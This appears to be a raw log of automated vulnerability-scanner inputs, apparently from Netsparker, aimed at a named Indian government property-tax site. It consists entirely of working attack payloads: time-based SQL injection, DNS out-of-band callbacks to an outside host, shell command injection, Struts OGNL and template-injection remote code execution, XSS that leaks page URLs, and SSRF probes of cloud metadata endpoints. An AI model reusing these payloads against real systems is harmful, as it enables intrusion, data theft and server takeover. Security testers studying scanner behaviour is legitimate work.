2651 1 + ((SELECT 1 FROM (SELECT SLEEP(25))A))/*'XOR(((SELECT 1 FROM (SELECT SLEEP(25))A)))OR'|"XOR(((SEL
2652 Smith '||(SELECT dblink_connect('host=sbrj_544ntopmclesdmxfkhsmsxafseinjjpdr6j'||'woe.r87.me user=a password=a connect_timeout=2'))||'
2653 (select UTL_INADDR.GET_HOST_ADDRESS('sbrj_544ntbx5ipwr7ytxyljs4ndc-24ypglmfuu'||'weq.r87.me') from DUAL)
2654 +createobject("WScript.Shell").exec("nslookup sbrj_544ntykssjzotkwtpzmuumyefxenm-h3ojx" & "mpc.r87.m
2655 Smith
2656
2657 print(int)0xFFF9999-10094
2658 127.100.11.2/elmah.axd
2659 1 + ((SELECT 1 FROM (SELECT SLEEP(25))A))/*'XOR(((SELECT 1 FROM (SELECT SLEEP(25))A)))OR'|"XOR(((SEL
2660 +createobject("WScript.Shell").exec("nslookup sbrj_544ntazx99qfkx2zfk7u4vpaul1yydsiezw" & "agi.r87.m
2661
2662 +createobject("WScript.Shell").exec("nslookup sbrj_544ntvx6kez4f23libqhknvhk35dczc3c6n" & "jvi.r87.m
2663 1 + ((SELECT 1 FROM (SELECT SLEEP(1))A))/*'XOR(((SELECT 1 FROM (SELECT SLEEP(1))A)))OR'|"XOR(((SELEC
2664 Smith print(int)0xFFF9999-93261
2665 Smith (select UTL_INADDR.GET_HOST_ADDRESS('sbrj_544ntftuloqrd-ntuna9-na0p0dnmwiyvol'||'8gg.r87.me') from DUAL)
2666 127.100.11.2/elmah.axd
2667 Smith
2668 1 + ((SELECT 1 FROM (SELECT SLEEP(1))A))/*'XOR(((SELECT 1 FROM (SELECT SLEEP(1))A)))OR'|"XOR(((SELEC
2669 Smith
2670 (length(CTXSYS.DRITHSX.SN(user,(select UTL_INADDR.GET_HOST_ADDRESS('sbrj_544ntzfsq1v_owwci45pwrbzjuvmbkwwb7x'||'bpg.r87.me') from DUAL))))
2671 <%createobject("WScript.Shell").exec("nslookup sbrj_544ntsq_o2uogzteacevqfxpy7dvgov9f9_" & "2nm.r87.
2672 127.0.0.1/elmah.axd
2673 1 + ((SELECT 1 FROM (SELECT SLEEP(30))A))/*'XOR(((SELECT 1 FROM (SELECT SLEEP(30))A)))OR'|"XOR(((SEL
2674 print(int)0xFFF9999-21012;
2675 Smith (length(CTXSYS.DRITHSX.SN(user,(select UTL_INADDR.GET_HOST_ADDRESS('sbrj_544ntsx4xlj5mvkbnxzbka32ikfcotivq8c'||'thu.r87.me') from DUAL))))
2676 '||CTXSYS.DRITHSX.SN(user,(select UTL_INADDR.GET_HOST_ADDRESS('sbrj_544nt8sle80b1qelapyzh4uevlmcqyxlbmp'||'xwg.r87.me') from DUAL))||'
2677 1 + ((SELECT 1 FROM (SELECT SLEEP(30))A))/*'XOR(((SELECT 1 FROM (SELECT SLEEP(30))A)))OR'|"XOR(((SEL
2678
2679 Smith '||CTXSYS.DRITHSX.SN(user,(select UTL_INADDR.GET_HOST_ADDRESS('sbrj_544nt4j9eq4flalv8vk7pgft4mmjkmcvfhg'||'s7u.r87.me') from DUAL))||'
2680 Smith print(int)0xFFF9999-45615;
2681 127.0.0.1/elmah.axd
2682 -1 AND ((SELECT 1 FROM (SELECT 2)a WHERE 1=sleep(25)))-- 1 /* e4e31f02-088c-4180-9c12-2e0842495f91 *
2683 "+createobject("WScript.Shell").exec("nslookup sbrj_544ntzk9f3-0imwlilfsus2v6hqkq70pfvk" & "98e.r87.
2684 +print(int)0xFFF9999-17854;//
2685 Smith
2686
2687 <%createobject("WScript.Shell").exec("nslookup sbrj_544ntywisxrxm2y2lvvpa564chtwakkdn9a" & "b8i.r87.
2688 -1 AND ((SELECT 1 FROM (SELECT 2)a WHERE 1=sleep(1)))-- 1 /* c185cf43-d6bd-47bf-82d1-063755a4289c */
2689 (select UTL_INADDR.GET_HOST_ADDRESS(chr(115)||chr(98)||chr(114)||chr(106)||chr(95)||chr(53)||chr(52)||chr(52)||chr(110)||chr(116)||chr(55)||chr(111)||chr(51)||chr(109)||chr(121)||chr(98)||chr(103)||chr(105)||chr(106)||chr(115)||chr(51)||chr(121)||chr(106)||chr(104)||chr(98)||chr(119)||chr(104)||chr(118)||chr(111)||chr(45)||chr(118)||chr(104)||chr(55)||chr(111)||chr(104)||chr(49)||chr(104)||chr(117)||chr(113)||chr(111)||chr(101)||chr(100)||chr(97)||chr(46)||chr(114)||chr(56)||chr(55)||chr(46)||ch
2690 "+createobject("WScript.Shell").exec("nslookup sbrj_544nt5ppcduryorjps7jwnevhvilvi4f2l5" & "has.r87.
2691 Smith +print(int)0xFFF9999-76802;//
2692 [::1]/elmah.axd
2693
2694 Smith
2695 gethostbyname(lc 'sbrj_544ntgy74ofn9vtgwvfwz0jax195rgmsfku'.'o5c.r87.me')
2696 Smith
2697 Smith (select UTL_INADDR.GET_HOST_ADDRESS(chr(115)||chr(98)||chr(114)||chr(106)||chr(95)||chr(53)||chr(52)||chr(52)||chr(110)||chr(116)||chr(98)||chr(114)||chr(108)||chr(109)||chr(111)||chr(117)||chr(104)||chr(109)||chr(100)||chr(102)||chr(117)||chr(56)||chr(109)||chr(97)||chr(119)||chr(113)||chr(108)||chr(55)||chr(117)||chr(120)||chr(113)||chr(116)||chr(103)||chr(122)||chr(105)||chr(45)||chr(104)||chr(115)||chr(117)||chr(49)||chr(106)||chr(112)||chr(56)||chr(46)||chr(114)||chr(56)||chr(55)||chr(46)||
2698 -1 AND ((SELECT 1 FROM (SELECT 2)a WHERE 1=sleep(1)))-- 1 /* 9f3e71d0-d25e-4c41-af4a-192203a41a60 */
2699 gethostbyname(lc 'sbrj_544nttfzuprugepqrlucrza1_jbhdtcyn5b'.'ivs.r87.me')
2700 '+print(int)0xFFF9999-71478+'
2701 eval('gethostbyname(lc 'sbrj_544ntoq3c2b4d0dltewlhijbrbnlkkklgnl'.'_40.r87.me')')
2702 (length(CTXSYS.DRITHSX.SN(user,(select UTL_INADDR.GET_HOST_ADDRESS(chr(115)||chr(98)||chr(114)||chr(106)||chr(95)||chr(53)||chr(52)||chr(52)||chr(110)||chr(116)||chr(115)||chr(114)||chr(105)||chr(51)||chr(113)||chr(98)||chr(112)||chr(97)||chr(116)||chr(51)||chr(99)||chr(95)||chr(109)||chr(104)||chr(110)||chr(115)||chr(50)||chr(95)||chr(113)||chr(52)||chr(105)||chr(99)||chr(115)||chr(52)||chr(102)||chr(116)||chr(101)||chr(104)||chr(99)||chr(54)||chr(116)||chr(56)||chr(115)||chr(46)||chr(114)||chr
2703 [::1]/elmah.axd
2704 Smith (length(CTXSYS.DRITHSX.SN(user,(select UTL_INADDR.GET_HOST_ADDRESS(chr(115)||chr(98)||chr(114)||chr(106)||chr(95)||chr(53)||chr(52)||chr(52)||chr(110)||chr(116)||chr(110)||chr(109)||chr(113)||chr(119)||chr(56)||chr(56)||chr(114)||chr(122)||chr(109)||chr(104)||chr(52)||chr(108)||chr(55)||chr(116)||chr(110)||chr(55)||chr(105)||chr(111)||chr(97)||chr(111)||chr(103)||chr(118)||chr(103)||chr(99)||chr(109)||chr(120)||chr(52)||chr(122)||chr(52)||chr(110)||chr(114)||chr(119)||chr(111)||chr(46)||chr(114)
2705
2706 Smith '+print(int)0xFFF9999-94509+'
2707 eval('gethostbyname(lc 'sbrj_544ntgwne5admztkqfmszqpnn-oakph5mzf'.'ddk.r87.me')')
2708 '||CTXSYS.DRITHSX.SN(user,(select UTL_INADDR.GET_HOST_ADDRESS(chr(115)||chr(98)||chr(114)||chr(106)||chr(95)||chr(53)||chr(52)||chr(52)||chr(110)||chr(116)||chr(108)||chr(118)||chr(107)||chr(122)||chr(119)||chr(51)||chr(107)||chr(104)||chr(52)||chr(53)||chr(99)||chr(116)||chr(102)||chr(110)||chr(102)||chr(52)||chr(45)||chr(101)||chr(107)||chr(108)||chr(109)||chr(98)||chr(111)||chr(48)||chr(100)||chr(104)||chr(49)||chr(98)||chr(104)||chr(117)||chr(108)||chr(114)||chr(119)||chr(46)||chr(114)||chr(
2709 '+gethostbyname(lc 'sbrj_544ntparopf_3mesvrci8ylyjhztennegvy'.'mae.r87.me')+'
2710 Smith '||CTXSYS.DRITHSX.SN(user,(select UTL_INADDR.GET_HOST_ADDRESS(chr(115)||chr(98)||chr(114)||chr(106)||chr(95)||chr(53)||chr(52)||chr(52)||chr(110)||chr(116)||chr(118)||chr(120)||chr(118)||chr(100)||chr(120)||chr(48)||chr(101)||chr(98)||chr(116)||chr(53)||chr(49)||chr(104)||chr(122)||chr(120)||chr(100)||chr(112)||chr(100)||chr(53)||chr(116)||chr(50)||chr(99)||chr(97)||chr(103)||chr(55)||chr(110)||chr(95)||chr(100)||chr(107)||chr(109)||chr(119)||chr(106)||chr(101)||chr(109)||chr(46)||chr(114)||chr(
2711 https://propertytax.jk.gov.in/elmah
2712 Smith
2713 '+gethostbyname(lc 'sbrj_544ntgurml9yjaqjffluwgsp1ijgl-qbxvl'.'62w.r87.me')+'
2714 -1 AND ((SELECT 1 FROM (SELECT 2)a WHERE 1=sleep(25)))-- 1 /* f439df15-4490-40d5-a470-6f38f2cf8e5a *
2715 "+gethostbyname(lc 'sbrj_544ntxqaqar3ttcywtquece89gf0wj8q8k2'.'eiy.r87.me')+"
2716 "+print(int)0xFFF9999-31844+"
2717
2718
2719 https://propertytax.jk.gov.in/elmah
2720 Smith "+print(int)0xFFF9999-25349+"
2721 -1 AND ((SELECT 1 FROM (SELECT 2)a WHERE 1=sleep(1)))-- 1 /* 735954dc-8a67-4928-882e-8bd61c55d4df */
2722 "+gethostbyname(lc 'sbrj_544ntv9eviq6wvqrroqnabpdb3abcafsskz'.'m_0.r87.me')+"
2723 nslookup sbrj_544ntcqna-2f_xfip7wdi9mq9qm-vpldeok^oic.r87.me&'\"`0&nslookup sbrj_544ntcqna-2f_xfip7w
2724 -1 AND ((SELECT 1 FROM (SELECT 2)a WHERE 1=sleep(1)))-- 1 /* e86b0592-5453-4e30-84c5-959b61f2a230 */
2725 nslookup sbrj_544ntgbj8re9sebjkiuilstormywq3zwkti^sgc.r87.me&'\"`0&nslookup sbrj_544ntgbj8re9sebjkiu
2726 Smith
2727 Smith
2728 propertytax.jk.gov.in/elmah
2729
2730 & nslookup sbrj_544nt_rokbl-gpdvxobspfcfftb8uq7ro2a^hji.r87.me&'\"`0&nslookup sbrj_544nt_rokbl-gpdvx
2731 {php}print(int)0xFFF9999-14293;{/php}
2732 & nslookup sbrj_544ntu_9htjkhr4le6aaj7cakdq4adq4lyc^lok.r87.me&'\"`0&nslookup sbrj_544ntu_9htjkhr4le
2733 propertytax.jk.gov.in/elmah
2734 '& nslookup sbrj_544ntvhk4ucpklc4x9fmog1-gvmiqk8rjt8^dnw.r87.me&'\"`0&nslookup sbrj_544ntvhk4ucpklc4
2735 ((select sleep(25)))a-- 1 /* 9f3737ef-9bab-4ef2-8142-7c65834fcdf4 */
2736 '& nslookup sbrj_544ntcj2h1mvv4b36s0spse1fslou5gu3ej^zl4.r87.me&'\"`0&nslookup sbrj_544ntcj2h1mvv4b3
2737 Smith {php}print(int)0xFFF9999-40032;{/php}
2738 164.100.223.17/elmah
2739 "& nslookup sbrj_544nt1lie1cgss_97-x9kdcipfsjsf1vexx^i7m.r87.me&'\"`0&nslookup sbrj_544nt1lie1cgss_9
2740 ((select sleep(25)))a-- 1 /* 0c9c2868-60c9-42c6-ae65-92a38be162c4 */
2741 Smith
2742 '{${print(int)0xFFF9999-62364}}'
2743
2744 ((select sleep(1)))a-- 1 /* 2c2c87c7-95aa-45f1-9228-597d6b32d53b */
2745 ((select sleep(1)))a-- 1 /* be5b5be9-739c-4574-a8f4-b40a10bf0c03 */
2746 Smith '{${print(int)0xFFF9999-60012}}'
2747 "& nslookup sbrj_544ntjz4lihsu43_tfjc2izbspt-xzolznj^8qo.r87.me&'\"`0&nslookup sbrj_544ntjz4lihsu43_
2748 164.100.223.17/elmah
2749 Smith
2750
2751 [php]print(int)0xFFF9999-88067;[/php]
2752 ((select sleep(30)))a-- 1 /* 26531a10-e20e-48ad-9d00-26bc8d14f5e2 */
2753 nslookup "sbrj_544ntafxvsm-57e2fd3euolzy2uvskxx90w""gms.r87.me"
2754 127.100.11.2/elmah
2755 Smith
2756 ((select sleep(30)))a-- 1 /* 0f70dd61-1e0c-410a-ad94-de878ae89f4f */
2757 127.100.11.2/elmah
2758 Smith [php]print(int)0xFFF9999-65994;[/php]
2759 nslookup "sbrj_544ntvwkcey--yl84lvz58avwzokptafdir""i68.r87.me"
2760 127.0.0.1/elmah
2761 (select dbms_pipe.receive_message((chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)|
2762 %{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='81945').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?
2763 Smith %{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='22100').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?
2764
2765 127.0.0.1/elmah
2766 &nslookup "sbrj_544ntypu8aega9noz1kwbvp-nzvqrp6zmsk""_e8.r87.me"
2767 print localtime()*0+0xFFF9999-50762
2768 (select dbms_pipe.receive_message((chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)|
2769 &nslookup "sbrj_544ntykwieppcw6gpdpjpuzt8dhwkacmttf""l4k.r87.me"
2770 (select dbms_pipe.receive_message((chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)|
2771 (select dbms_pipe.receive_message((chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)|
2772 (select dbms_pipe.receive_message((chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)|
2773 Smith print localtime()*0+0xFFF9999-33689
2774 '&nslookup "sbrj_544nth8xmt7hydatzo6k2e8jd4xl31ela21""gno.r87.me"
2775 Smith
2776 [::1]/elmah
2777 '&nslookup "sbrj_544ntn5kxsibniio-dutojikflqbmvmztux""pgg.r87.me"
2778 [::1]/elmah
2779 (select dbms_pipe.receive_message((chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)|
2780 ";l=document.createElement("link");l.rel="prefetch";l.href="//sbrj_544ntfg2vey6fkqxfx2jl1_yftayadvxaru"+"jxc.r87.me/r/?"+location.href;document.head.appendChild(l);//
2781 eval('print localtime()*0+0xFFF9999-56042')
2782 Smith eval('print localtime()*0+0xFFF9999-50583')
2783
2784 1' || (select dbms_pipe.receive_message((chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr
2785 "&nslookup "sbrj_544nten2hp_cxp_nedprjva9fzcv95anm_7""i9y.r87.me"
2786 '+print localtime()*0+0xFFF9999-9731+'
2787 Smith ";l=document.createElement("link");l.rel="prefetch";l.href="//sbrj_544ntopjviodrosvkdhrtrzwz4aoxwxan2c"+"f0w.r87.me/r/?"+location.href;document.head.appendChild(l);//
2788 |nslookup${IFS}"sbrj_544ntzpl5c8fusgukwegjts1hzbnpgpy6pj""xlm.r87.me"
2789 1' || (select dbms_pipe.receive_message((chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr
2790 Smith
2791 Smith '+print localtime()*0+0xFFF9999-75127+'
2792 http://aws.r87.me/latest/meta-data/public-hostname
2793 |nslookup${IFS}"sbrj_544ntux3d6vaas5dfvebyln3yj7ujbcqcak""ydm.r87.me"
2794 1 + (select dbms_pipe.receive_message((chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(1
2795 "+print localtime()*0+0xFFF9999-28181+"
2796 http://aws.r87.me/latest/meta-data/public-hostname
2797 ';l=document.createElement("link");l.rel="prefetch";l.href="//sbrj_544nt4s7q8a0nxvymvm28aodhuxutuwdsxa"+"uey.r87.me/r/?"+location.href;document.head.appendChild(l);//
2798 %{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#c
2799
2800 %{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#c
2801 %{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#c
2802 Smith "+print localtime()*0+0xFFF9999-31168+"
2803 1 + (select dbms_pipe.receive_message((chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(1
2804 %{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#c
2805 1 + (select dbms_pipe.receive_message((chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(1
2806 Smith
2807 http://169.254.169.254/latest/meta-data/public-hostname
2808 {{__import__('os').popen(__import__('base64').urlsafe_b64decode('bnNsb29rdXAgc2Jyal81NDRudHBzc2dmbW9
2809 1 + (select dbms_pipe.receive_message((chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(1
2810
2811 Smith ';l=document.createElement("link");l.rel="prefetch";l.href="//sbrj_544nt3aoeplx6pcjai6scbgpzrnoz8apojl"+"s8i.r87.me/r/?"+location.href;document.head.appendChild(l);//
2812 http://169.254.169.254/latest/meta-data/public-hostname
2813 {{__import__('os').popen(__import__('base64').urlsafe_b64decode('bnNsb29rdXAgc2Jyal81NDRudHJ2a2J4ei1
2814 arguments[1].end(require('child_process').execSync('expr 268409241 - 17705'))
2815 http://127.0.0.1:22
2816 1 + (select dbms_pipe.receive_message((chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(1
2817 {% set d = "eval(__import__('base64').urlsafe_b64decode('X19pbXBvcnRfXygnb3MnKS5wb3BlbihfX2ltcG9ydF9
2818 1 + (select dbms_pipe.receive_message((chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(1
2819 Smith
2820 {% set d = "eval(__import__('base64').urlsafe_b64decode('X19pbXBvcnRfXygnb3MnKS5wb3BlbihfX2ltcG9ydF9
2821 = global.process.mainModule.require('child_process').execSync(Buffer('bnNsb29rdXAgc2Jyal81NDRudGF4dm
2822 http://127.0.0.1:22
2823 Smith arguments[1].end(require('child_process').execSync('expr 268409241 - 55120'))
2824 1';SELECT pg_sleep(25)-- /* c6d8bb54-1243-4184-b42e-5e10b00d6cdb */
2825
2826 1';SELECT pg_sleep(25)-- /* fdd53c4b-c59e-48a3-9e25-e1d87e6dc9f8 */
2827 Smith
2828 = global.process.mainModule.require('child_process').execSync(Buffer('bnNsb29rdXAgc2Jyal81NDRudDBrcm
2829 <%- global.process.mainModule.require('child_process').execSync(Buffer('bnNsb29rdXAgc2Jyal81NDRudG1n
2830 1;SELECT pg_sleep(25)-- /* 98a49df2-c564-4f58-b6d4-b5e84cb71823 */
2831 http://164.100.223.17:22
2832
2833 arguments[1].end(require('child_process').execSync('set /A 268409241 - 83622'))
2834 1;SELECT pg_sleep(25)-- /* cac9da76-822e-48e2-aa2b-daf20c2e69b5 */
2835 <%- global.process.mainModule.require('child_process').execSync(Buffer('bnNsb29rdXAgc2Jyal81NDRudHAy
2836 Smith
2837 http://164.100.223.17:22
2838 SELECT pg_sleep(25)-- /* 6c52cad5-9659-4788-89b1-19ce8cea815c */
2839 http://[::1]:22
2840 SELECT pg_sleep(25)-- /* 8f012f78-016a-4d62-b3da-5fca5d725b44 */
2841 {php}Smarty_Resource::parseResourceName(system("nslookup sbrj_544ntdgtlbsbrf5fmu7ua9zj2djicf7d_mr"."
2842 Smith arguments[1].end(require('child_process').execSync('set /A 268409241 - 11062'))
2843 http://[::1]:22
2844 1);SELECT pg_sleep(25)-- /* 208facba-5578-40c8-9906-eaf0ea04637b */
2845 http://127.0.0.1:3306
2846 {php}Smarty_Resource::parseResourceName(system("nslookup sbrj_544ntgopizhym70e4czt1-8cb6wpfuf4nds"."
2847 n3tsp4rke2
2848 %{#context["com.opensymphony.xwork2.dispatcher.HttpServletResponse"].addHeader("a",268409241-7988)}
2849 1);SELECT pg_sleep(25)-- /* fc9e60a4-2dde-4ee0-ba50-ef37ce76ac85 */
2850 %27%22--%3E%3C%2Fstyle%3E%3C%2FscRipt%3E%3CscRipt%3Enetsparker%280x0092E5%29%3C%2FscRipt%3E
2851 1');SELECT pg_sleep(25)-- /* 3cd7843f-5454-4f9b-af22-89e3d081f48d */
2852 Smith %{#context["com.opensymphony.xwork2.dispatcher.HttpServletResponse"].addHeader("a",268409241-54984)}
2853 {{_self.env.registerUndefinedFilterCallback("system")}}{{_self.env.getFilter("nslookup sbrj_544ntwyv
2854 Smith %27%22--%3E%3C%2Fstyle%3E%3C%2FscRipt%3E%3CscRipt%3Enetsparker%280x0092E6%29%3C%2FscRipt%3E
2855 http://127.0.0.1:3306
2856 1');SELECT pg_sleep(25)-- /* e2a90d1b-604b-43d2-9471-dc8d5e66dc2c */
2857 p "#{0xFFF9999.to_i-`echo 95451`.to_i}"
2858 http://164.100.223.17:3306
2859 data:;base64,JyI+PHNjcmlwdD5uZXRzcGFya2VyKDB4MDA5MkZFKTwvc2NyaXB0Pg==
2860 1');SELECT pg_sleep(1)-- /* 31dacc7d-7db3-4b40-9a98-402f8bc5b90c */
2861 1');SELECT pg_sleep(1)-- /* 374c44f4-b3e6-4dcd-968f-6269810d218e */
2862 Smith p "#{0xFFF9999.to_i-`echo 29452`.to_i}"
2863 {{_self.env.registerUndefinedFilterCallback("system")}}{{_self.env.getFilter("nslookup sbrj_544ntzcy
2864 http://164.100.223.17:3306
2865 Smith data:;base64,JyI+PHNjcmlwdD5uZXRzcGFya2VyKDB4MDA5MkZGKTwvc2NyaXB0Pg==
2866 1');SELECT pg_sleep(30)-- /* f0b8b994-5de1-4a45-9908-2b63da2e933a */
2867 <%= "#{(require'base64';%x(#{Base64.urlsafe_decode64('bnNsb29rdXAgc2Jyal81NDRudGdqbWNhemxkX29mejNpeH
2868 1');SELECT pg_sleep(30)-- /* 333bc779-703c-437d-803a-ac98f4e278b8 */
2869 <%= "#{(require'base64';%x(#{Base64.urlsafe_decode64('bnNsb29rdXAgc2Jyal81NDRudGIzZjR6eXN2YmY1cXRxcT
2870 http://[::1]:3306
2871 '" ns=netsparker(0x009360)
2872 1'));SELECT pg_sleep(25)-- /* ad226ce5-fc35-4f2e-b62c-b6a5c5968d39 */
2873 __import__('os').popen(('expr 268409241 - {0}').format('96152')).read()
2874 <#assign ex="freemarker.template.utility.Execute"?new()>${ ex("cmd.exe /c nslookup sbrj_544ntxvsqk0z
2875 Smith '" ns=netsparker(0x009361)
2876 http://[::1]:3306
2877 1'));SELECT pg_sleep(1)-- /* 6ff7752d-c9b6-4b3a-b25c-3a2dc6db031e */
2878 <#assign ex="freemarker.template.utility.Execute"?new()>${ ex("cmd.exe /c nslookup sbrj_544ntg7n1tle
2879 Smith __import__('os').popen(('expr 268409241 - {0}').format('67709')).read()
2880 require 'resolv';Resolv.getaddress ("sbrj_544nte-so0jdqbbhs18wsnwkbyuzdznk0d8".concat "zj0.r87.me")
2881 https://propertytax.jk.gov.in/server-status
2882 require 'resolv';Resolv.getaddress ("sbrj_544ntnjnmfwgtmh9tcdhorta10an2mjv6mf".concat "w1k.r87.me")
2883 1 ns=netsparker(0x0093B5)
2884 __import__('os').popen(('SET /A 268409241 - {0}').format('44615')).read()
2885 https://propertytax.jk.gov.in/server-status
2886 __import__('os').popen(__import__('base64').urlsafe_b64decode('bnNsb29rdXAgc2Jyal81NDRudHltZGJxbV9he
2887 http://169.254.169.254/opc/v1/instance
2888 Smith __import__('os').popen(('SET /A 268409241 - {0}').format('8866')).read()
2889 __import__('os').popen(__import__('base64').urlsafe_b64decode('bnNsb29rdXAgc2Jyal81NDRudGs5dXhnY3Zpb
2890 Smith 1 ns=netsparker(0x0093B6)
2891 http://169.254.169.254/opc/v1/instance
2892 1'));SELECT pg_sleep(1)-- /* 3edbabd6-3747-4c22-9db1-e4f73159e997 */
2893 https://metadata.packet.net/metadata
2894
2895 Smith
2896
2897 Smith
2898 https://metadata.packet.net/metadata
2899
2900 1'));SELECT pg_sleep(25)-- /* 30ce28ef-3bf3-4e9b-9f01-a4d5c50e009f */
2901 //r87.com/n/n.css?0x0094FA
2902 Smith
2903
2904
2905
2906 Smith '+netsparker(0x00971C)+'
2907 '+netsparker(0x00971B)+'
2908 Smith
2909 1));SELECT pg_sleep(1)-- /* 5107d1b0-2360-462d-8da4-4e603fd8c9a6 */
2910 Smith */netsparker(0x0096FA);/*
2911
2912
2913
2914 1));SELECT pg_sleep(1)-- /* c286a120-2c32-4a1a-8b89-b1deadfaec7e */
2915 "+netsparker(0x009737)+"
2916 Smith n;ns:expression(netsparker(0x0096CD));
2917 Smith
2918 n;ns:expression(netsparker(0x0096CC));
2919
2920 1));SELECT pg_sleep(25)-- /* 6d3b0448-d5a7-4eb3-9a14-c4260d9217f0 */
2921
2922 1));SELECT pg_sleep(30)-- /* 4e1bc7ce-dedb-4623-b1ee-b9b539810152 */
2923 Smith <%a style=x:expre/**/ssion(netsparker(0x0096B6))>
2924
2925 Smith "+netsparker(0x009738)+"
2926 1));SELECT pg_sleep(30)-- /* 13daff2c-f6f1-4ee8-bb9d-c534fd90672e */
2927
2928 ((SELECT(1)FROM(SELECT(SLEEP(25)))A)) /* c38d49d1-8b99-41f3-87e6-9e09fdc38d99 */
2929 \';netsparker(0x0097A5);///
2930 Smith
2931 ((SELECT(1)FROM(SELECT(SLEEP(1)))A)) /* 0b864441-bb36-4b4e-a29f-008e4f8513d8 */
2932 <%a style=x:expre/**/ssion(netsparker(0x0096B5))>
2933
2934 ((SELECT(1)FROM(SELECT(SLEEP(1)))A)) /* 596d6363-6cac-4dbe-b0c8-80c57bc4d720 */
2935 Smith
2936
2937 ((SELECT(1)FROM(SELECT(SLEEP(30)))A)) /* 5d5d85d6-d78d-4d02-b07c-c8e3857eae52 */
2938 Smith \';netsparker(0x0097A6);///
2939 Smith
2940 Smith
2941 ((SELECT(1)FROM(SELECT(SLEEP(30)))A)) /* 1ccc3f98-6965-49c2-a1f1-2c133abcdc93 */
2942
2943
2944 Smith
2945 1'));SELECT pg_sleep(1)-- /* a0ab24e3-8c47-46dd-86e6-6ac2b793cc93 */
2946
2947 netsparker(0x0098C7)
2948 Smith
2949 ((SELECT(1)FROM(SELECT(SLEEP(25)))A)) /* 57602ba1-e97c-4ef9-94e9-bddff4620d9f */
2950 Smith
2951 Smith
2952 Smith netsparker(0x0098C8)
2953 '+((SELECT 1 FROM (SELECT SLEEP(25))A))+' /* 772e9f77-81e1-4bb0-86f5-21138636db70 */
2954 netsparker(0x009965);
2955
2956 '+((SELECT 1 FROM (SELECT SLEEP(1))A))+' /* 93ca5b46-321e-4c03-905e-4238d2b32d49 */
2957
2958 '+((SELECT 1 FROM (SELECT SLEEP(1))A))+' /* 03fe2364-9a46-4ebb-9493-9aa956b75b42 */
2959 Smith
2960 Smith
2961 Smith netsparker(0x009966);
2962
2963 '+((SELECT 1 FROM (SELECT SLEEP(25))A))+' /* ad85dff2-8cdc-409e-a462-18021cffde79 */
2964
2965
2966 Smith
2967 '+((SELECT 1 FROM (SELECT SLEEP(1))A))+' /* a47fdde7-c4f6-4102-b588-f3859677f7d1 */
2968 Smith
2969 Smith
2970 -1" or 1=((SELECT 1 FROM (SELECT SLEEP(25))A))+" /* dd43ed09-c2fc-4e2a-afcd-a7921553b2e6 */
2971
2972 Smith
2973 127.100.11.2/trace.axd
2974 127.0.0.1/trace.axd
2975
2976 Smith
2977 Smith
2978 -1" or 1=((SELECT 1 FROM (SELECT SLEEP(1))A))+" /* 4d473032-1834-453f-8210-c80f9bc09f5b */
2979 Smith
2980
2981 -1" or 1=((SELECT 1 FROM (SELECT SLEEP(1))A))+" /* 85c85ed9-1af0-4d31-a0de-26b4c7da8187 */
2982 Smith gethostbyname(trim('sbrj_544ntj7m0tgvj3gkk7hquwv0iatk4c6pmy5'.'0da.r87.me'))
2983 Smith
2984 Smith 127.0.0.1/trace.axd
2985 Smith
2986
2987 gethostbyname(trim('sbrj_544nt9oltpbcuxsdk4td_xtdfa2cho3qj6k'.'ixy.r87.me'));
2988 Smith
2989 -1" or 1=((SELECT 1 FROM (SELECT SLEEP(30))A))+" /* 4d62679d-c81e-4cfe-b81c-7bdc37a8c749 */
2990 Smith gethostbyname(trim('sbrj_544nts0o70w30dhdctjwhx0ql3w3bpg8gi2'.'mwc.r87.me'));
2991 [::1]/trace.axd
2992 -1 or 1=((SELECT 1 FROM (SELECT SLEEP(25))A)) /* 7af34fbf-cf5e-409a-a348-a9cc707e79bc */
2993
2994 -1" or 1=((SELECT 1 FROM (SELECT SLEEP(25))A))+" /* e5c5cb0d-96fe-406a-8f5f-c1abfe24e87f */
2995 -1" or 1=((SELECT 1 FROM (SELECT SLEEP(30))A))+" /* dcfc6474-2284-4c99-b294-7c6b4c22d193 */
